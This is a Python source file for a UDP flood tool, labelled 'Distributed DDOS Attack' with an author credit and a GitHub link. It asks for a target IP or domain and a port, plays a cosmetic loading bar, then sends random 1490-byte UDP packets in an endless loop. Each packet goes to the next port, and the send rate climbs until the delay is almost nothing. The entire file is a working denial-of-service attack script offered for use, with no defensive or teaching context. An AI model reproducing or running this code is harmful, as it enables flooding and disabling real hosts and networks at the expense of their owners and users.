mport os
import platform
import socket
import sys
import time
from datetime import datetime

# Initialize operating system environment for ANSI color codes
if platform.system() == "Windows":
    os.system("")

# Capture utility instantiation timestamp
execution_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")

# Initialize networking socket object (UDP Protocol)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# Highly optimized data payload generation matching MTU bounds
attack_bytes = os.urandom(1490)

# Defined terminal interface styling pallet
AMARILLO = "\033[93m"
BLANCO = "\033[97m"
CYAN = "\033[96m"
VERDE = "\033[92m"
ROJO = "\033[91m"
MAGENTA = "\033[95m"
RESET = "\033[0m"

banner = """
‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó
‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēź‚ēź‚ēĚ
‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó
‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ‚ēö‚ēź‚ēź‚ēź‚ēź‚Ėą‚Ėą‚ēĎ
‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚ēö‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĎ
‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ  ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ 
"""

def display_header():
    """Renders the main tool information panel."""
    print(VERDE + banner + RESET)
    print(VERDE + f"Distributed DDOS Attack - By Rhuebarbs | {execution_time}" + RESET)
    print(VERDE + "-" * 67 + RESET)
    print("Author : Rhuebarbs")
    print("Github : https://github.com/Dynjee")
    print(VERDE + "-" * 67 + RESET)

# Initial environment flush and configuration load
os.system("clear" if os.name == "posix" else "cls")
display_header()

# Collect targeted destination metrics
target_ip = input(VERDE + "IP Target / Domain : " + RESET)
try:
    target_port = int(input(VERDE + "Port               : " + RESET))
except ValueError:
    print(ROJO + "\n[-] Fatal Error: Port entry must be a numeric integer value." + RESET)
    sys.exit(1)

# Transition screen rendering
os.system("clear" if os.name == "posix" else "cls")
print(VERDE + """
    ___   __  __             __      _____ __             __           __   __
   /   | / /_/ /_____ ______/ /__   / ___// /_____ ______/ /____  ____/ /  / /
  / /| |/ __/ __/ __ `/ ___/ //_/   \__ \/ __/ __ `/ ___/ __/ _ \/ __  /  / / 
 / ___ / /_/ /_/ /_/ / /__/ ,<     ___/ / /_/ /_/ / /  / /_/  __/ /_/ /  /_/  
/_/  |_\__/\__/\__,_/\___/_/|_|   /____/\__/\__,_/_/   \__/\___/\__,_/  (_)   
""" + RESET)

# Sequenced progress bar configurations
progress_steps = [
    "[                    ]", "[#                   ]", "[##                  ]",
    "[###                 ]", "[####                ]", "[#####               ]",
    "[######              ]", "[#######             ]", "[########            ]",
    "[_________           ]", "[##########          ]", "[###########         ]",
    "[############        ]", "[#############       ]", "[##############      ]",
    "[###############     ]", "[################    ]", "[#################   ]",
    "[##################  ]", "[################### ]", "[####################]"
]

# Synchronous loading bar animation simulation loop
print(f"Connecting to target {target_ip} on port {target_port}...\n")
for step_idx, step_frame in enumerate(progress_steps):
    completion_percentage = int((step_idx + 1) / len(progress_steps) * 100)
    formatted_frame = step_frame.replace("[", f"[{VERDE}").replace("]", f"{RESET}]")
    sys.stdout.write(f"\r{formatted_frame} {completion_percentage}%")
    sys.stdout.flush()
    time.sleep(0.04)

print("\n\n[+] Status: Interface initialized successfully.")
time.sleep(1)

# Operation variable initial state metrics
packets_transmitted = 0
acceleration_rate = 0.1
multiplication_factor = 1.05

try:
    while True:
        # Commit transactional UDP network data payload transfer
        sock.sendto(attack_bytes, (target_ip, target_port))
        packets_transmitted += 1
        
        print(f"Sent {packets_transmitted} packet to {target_ip} through port:{target_port}")
        
        # Sequentially cycle port destination array bounds
        target_port += 1
        if target_port > 65535:
            target_port = 1

        # Smooth transaction throttle calculation 
        acceleration_rate *= multiplication_factor
        calculated_delay = 1 / acceleration_rate

        # Lower-bound guard to shield loop thread from registry execution crash
        if calculated_delay > 0.0002:
            time.sleep(calculated_delay)
        else:
            time.sleep(0.0002)

except KeyboardInterrupt:
    print("\n" + ROJO + "[*] User interrupted the attack operation." + RESET)
except socket.gaierror:
    print("\n" + ROJO + "[-] Network Error: Failed to resolve the target host identifier name." + RESET)
except Exception as error_msg:
    print(f"\nRuntime Error: {error_msg}")
